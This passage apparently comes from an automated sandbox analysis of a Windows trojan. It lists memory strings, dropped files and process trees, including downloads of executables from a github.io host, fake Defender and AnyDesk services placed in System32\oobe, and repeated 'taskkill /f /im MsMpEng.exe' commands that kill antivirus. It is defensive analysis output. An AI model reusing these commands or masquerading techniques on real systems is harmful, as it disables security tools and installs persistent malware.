00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllRo-
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381142881.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2253907648.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllao
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000002.2170001507.000002762097C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllges
Source: AnyDeskUpdateService.exe, 00000088.00000002.2580124899.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllhttps://duy-thanh.github.io/file/AnyDesk
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllmsml
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllz
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2253907648.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2580698857.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381038957.000001F7B17DA000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17B0000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2253907648.000001F7B17A9000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17B0000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2580698857.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B179E000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B179E000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17AC000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskUpdateService.exe
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskUpdateService.exe3l
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386441778.00000004C6DF9000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskUpdateService.exeC:
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskUpdateService.exedf-msMo
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskUpdateService.exeml
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/AnyDeskUpdateService.exeup
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A06000.00000004.00000020.00020000.00000000.sdmp, AnyDeskUpdateService.exeString found in binary or memory: https://duy-thanh.github.io/file/MicrosoftWindowsDefenderCoreService.exe
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/MicrosoftWindowsDefenderCoreService.exep
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/MicrosoftWindowsDefenderCoreService.exev
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B179E000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17AC000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txt
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2580698857.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txt%l
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386691306.000001F7B1727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txt.dll
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txt8Y
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381142881.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txt9c4a2f8b514.cdf-msMo
Source: MicrosoftWindowsDefenderCoreService.exe, 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386441778.00000004C6DF9000.00000004.00000010.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387459125.00007FF76E181000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://duy-thanh.github.io/file/version.txtC:
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452617242.000001F7B1789000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B178A000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B1789000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516905564.000001F7B1789000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/version.txtD
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17AC000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381038957.000001F7B17DA000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17B0000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B179E000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/version.txtX
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/version.txtb.io/file/AnyDeskCrashHandler.exe
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381142881.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/version.txtb.io/file/version.txt3l
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/version.txtb.io/file/version.txteService.exe3l
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381038957.000001F7B17DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/version.txte1
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/version.txtr
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/version.txtt
Source: unknown | HTTPS traffic detected: 185.199.110.153:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.153:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: Conhost.exe | Process created: 46
Source: sc.exe | Process created: 50
Source: conhost.exe | Process created: 67
Source: cmd.exe | Process created: 118
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | File created: C:\Windows\System32\WindowsUpdate.txt
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | File created: C:\Windows\System32\AnyDeskShellIntegration.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | File created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | File created: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\System32\oobe\version.txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskUpdateService[1].exe
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskShellIntegration[1].dll
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File created: C:\Windows\System32\AnyDeskShellIntegration_Update.dll
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | File created: C:\Windows\System32\WindowsUpdate.txt
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | File deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\version[1].txt
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000000.2117381795.00007FF6C78AD000.00000008.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameAnyDeskUpdateService.exeJ vs SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameAnyDeskUpdateService.exeJ vs SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A06000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoftWindowsDefenderCoreService.exeh$ vs SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Binary or memory string: OriginalFilenameAnyDeskUpdateService.exeJ vs SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
Source: classification engine | Classification label: mal76.evad.winEXE@545/20@1/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: CreateServiceW,0_2_00007FF6C7890008
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: GetModuleFileNameW,GetLastError,OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,RegisterServiceCtrlHandlerW,SetServiceStatus,CreateEventW,SetServiceStatus,CreateThread,GetLastError,SetServiceStatus,_invalid_parameter_noinfo_noreturn,0_2_00007FF6C7857A20
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: GetModuleFileNameW,GetLastError,OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,RegisterServiceCtrlHandlerW,SetServiceStatus,CreateEventW,SetServiceStatus,CreateThread,GetLastError,SetServiceStatus,_invalid_parameter_noinfo_noreturn,SetServiceStatus,SetEvent,SetServiceStatus,5_2_00007FF76E1831E0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: GetModuleFileNameW,GetLastError,OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,RegisterServiceCtrlHandlerW,SetServiceStatus,CreateEventW,SetServiceStatus,CreateThread,GetLastError,SetServiceStatus,25_2_00007FF71DD87A20
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: CreateServiceW,25_2_00007FF71DDC0008
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: 0_2_00007FF6C7852840 GetFileAttributesW,GetFileAttributesW,InternetCloseHandle,GetFileAttributesW,MoveFileW,GetFileAttributesW,GetFileAttributesW,ShellExecuteExW,GetLastError,WaitForSingleObject,CloseHandle,lstrcmpiW,GetCurrentProcessId,ShellExecuteExW,GetLastError,StartServiceCtrlDispatcherW,0_2_00007FF6C7852840
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: 0_2_00007FF6C7890030 StartServiceCtrlDispatcherW,RegisterEventSourceW,0_2_00007FF6C7890030
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: 5_2_00007FF76E182090 GetCurrentProcessId,ShellExecuteExW,lstrcmpiW,StartServiceCtrlDispatcherW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,5_2_00007FF76E182090
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: 5_2_00007FF76E1B7030 StartServiceCtrlDispatcherW,5_2_00007FF76E1B7030
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: 25_2_00007FF71DD82840 GetFileAttributesW,GetFileAttributesW,InternetCloseHandle,GetFileAttributesW,MoveFileW,GetFileAttributesW,GetFileAttributesW,ShellExecuteExW,GetLastError,WaitForSingleObject,CloseHandle,lstrcmpiW,GetCurrentProcessId,ShellExecuteExW,GetLastError,StartServiceCtrlDispatcherW,25_2_00007FF71DD82840
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: 25_2_00007FF71DDC0030 StartServiceCtrlDispatcherW,OpenSCManagerW,25_2_00007FF71DDC0030
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\AnyDeskShellIntegration[1].dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5156:120:WilError_03
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeReversingLabs: Detection: 31%
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Process created: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe "C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe" install
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6636
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe Process created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2404
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: unknown Process created: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe "C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2128
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: unknown Process created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe "C:\Windows\System32\oobe\AnyDeskUpdateService.exe"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6552
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
